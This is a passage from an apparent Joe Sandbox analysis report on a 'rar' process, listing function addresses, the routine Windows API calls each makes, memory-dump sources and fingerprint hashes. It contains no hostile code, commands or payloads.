                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4044681568-0
                                                                                                                                                                      • Opcode ID: 4e01616fa307debef67f3bdae5e4254b32b96fa30cb3d95000aeda74735f0c5a
                                                                                                                                                                      • Instruction ID: 25ee249e61c2358ca0f066b728a5248e3b75d78070e6eb0949ff0877df908e94
                                                                                                                                                                      • Opcode Fuzzy Hash: 4e01616fa307debef67f3bdae5e4254b32b96fa30cb3d95000aeda74735f0c5a
                                                                                                                                                                      • Instruction Fuzzy Hash: 9901D301E0918306FA5CB3B954A6BBD94429FE1318FC6A17BE51D6A2E3CD1D68038771
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79E2440 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2976181284-0
                                                                                                                                                                      • Opcode ID: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                                                                                                                                      • Instruction ID: c8a8c21621af319bd6c7035f456da1f03a0bbac1006974ff230f3b6ddc975884
                                                                                                                                                                      • Opcode Fuzzy Hash: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                                                                                                                                      • Instruction Fuzzy Hash: 91018E22A08A4392EB68BB29E48466DA760EB8077CFD44333D13D011E5EF3CD587C720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79E30C8 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(00000800,00007FF7D79E305D,?,?,?,?,?,?,?,?,00007FF7D79F4126,?,?,?,?,00000800), ref: 00007FF7D79E30F0
                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF7D79F4126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF7D79E3119
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                      • Opcode ID: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                                                                                                                                      • Instruction ID: 07cdb33dfe66a06e64adecbccaa2a8ecc7010dc63e2c5b29e7aef97c4d03ab78
                                                                                                                                                                      • Opcode Fuzzy Hash: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                                                                                                                                      • Instruction Fuzzy Hash: 05F0A421B1868142EA60EB69F4553ADA260BB8C7D8FC00132ED9C83795DE6CD5864B10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A0B3F0 Relevance: 3.0, APIs: 2, Instructions: 28libraryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DirectoryLibraryLoadSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1175261203-0
                                                                                                                                                                      • Opcode ID: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                                                                                                                                      • Instruction ID: 1630b942060521cbabe1f4597f19e3781575156d8458157ad112af292a69e4ed
                                                                                                                                                                      • Opcode Fuzzy Hash: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                                                                                                                                      • Instruction Fuzzy Hash: 7EF01821B1858146F674AB64E8557FEA254BFD8784FC04433E9CD82659EE2CD2468720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A0BA70 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$AffinityCurrentMask
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1231390398-0
                                                                                                                                                                      • Opcode ID: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                                                                                                                                      • Instruction ID: 90a201e83333182167ec246a4488a8f786db7c764caa43583d2a1e39e59e7113
                                                                                                                                                                      • Opcode Fuzzy Hash: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                                                                                                                                      • Instruction Fuzzy Hash: D3E02B20B3455147DBDD6B6DC891FAE5390AF84B80FC02037F40BC3A14ED1CC4558B10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A24A74 Relevance: 3.0, APIs: 2, Instructions: 19threadCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 588628887-0
                                                                                                                                                                      • Opcode ID: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                                                                                                                                      • Instruction ID: 5e618428739e953e9972b4a3b85ffbb6a29967f8001ec85c930ce145c28cab5c
                                                                                                                                                                      • Opcode Fuzzy Hash: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                                                                                                                                      • Instruction Fuzzy Hash: 6DE08661E1964342FF4CBBFA540597D92916FD5B44FC45032D90D56251EE2C68434224
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A071FC Relevance: 1.9, APIs: 1, Instructions: 353COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 94d7068a19ad0216400a77a98d180080cd48a491331cd68647dd32dbf453e6d1
                                                                                                                                                                      • Instruction ID: 49b42d1408d4759089745d37c9d1825263ee71dd8d80405ad36ed2dcf55ba4ca
                                                                                                                                                                      • Opcode Fuzzy Hash: 94d7068a19ad0216400a77a98d180080cd48a491331cd68647dd32dbf453e6d1
                                                                                                                                                                      • Instruction Fuzzy Hash: B3E1E621A0868241FF28AA389454ABDA751EF81B89FC44537DE4D177DECE3DA447C731
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79C72C4 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 567dabfc89a2cec9927cd9eb1793eb6460b28c83310c7a4bae658423b5ddfb26
                                                                                                                                                                      • Instruction ID: 54bf070ec6d7a882e00bdf823b2f5e799381a58388fa70ce86bb6b770865bf8e
                                                                                                                                                                      • Opcode Fuzzy Hash: 567dabfc89a2cec9927cd9eb1793eb6460b28c83310c7a4bae658423b5ddfb26
                                                                                                                                                                      • Instruction Fuzzy Hash: E8512673518BD295E701AF64A8441ED77A8F744F98F98423AEA880B79ADF385052C731
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A2231C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3947729631-0
                                                                                                                                                                      • Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                      • Instruction ID: 4cf5b2fc31c2f193529585e1550197c16a90d3f8871639c913d3fde0bcad1c9b
                                                                                                                                                                      • Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                      • Instruction Fuzzy Hash: DE41B121A0EA5382FB6CBB5D9850A7DA2A1AFD0B40FC16437D90D676D1DF3CE8478361
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79D4D1C Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CommandLine
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3253501508-0
                                                                                                                                                                      • Opcode ID: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                                                                                                                                      • Instruction ID: 56e02c8b60c86e4a87a6536e76d8a85822f07171b2d2d4db3b764afc9712667a
                                                                                                                                                                      • Opcode Fuzzy Hash: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                                                                                                                                      • Instruction Fuzzy Hash: A401841360C64385EA54FB16A4941BDD6A0AF85B98FDC0433EE8D07379DE3DE4438720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A24B8C Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                      • Opcode ID: cd8da7e225d4e054d7198354b045464c529c48aefb4b06018a4c08b75c41078c
                                                                                                                                                                      • Instruction ID: b097fcfcb090b8d0cddc8a580d4d7278ba12a1cb3d83f46a06d76a0196281777
                                                                                                                                                                      • Opcode Fuzzy Hash: cd8da7e225d4e054d7198354b045464c529c48aefb4b06018a4c08b75c41078c
                                                                                                                                                                      • Instruction Fuzzy Hash: 71012150A1C64340F95CB6AE5640E7ED1915FD6BD4FC8A233ED1DA66D6ED1CAC034231
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A0A924 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
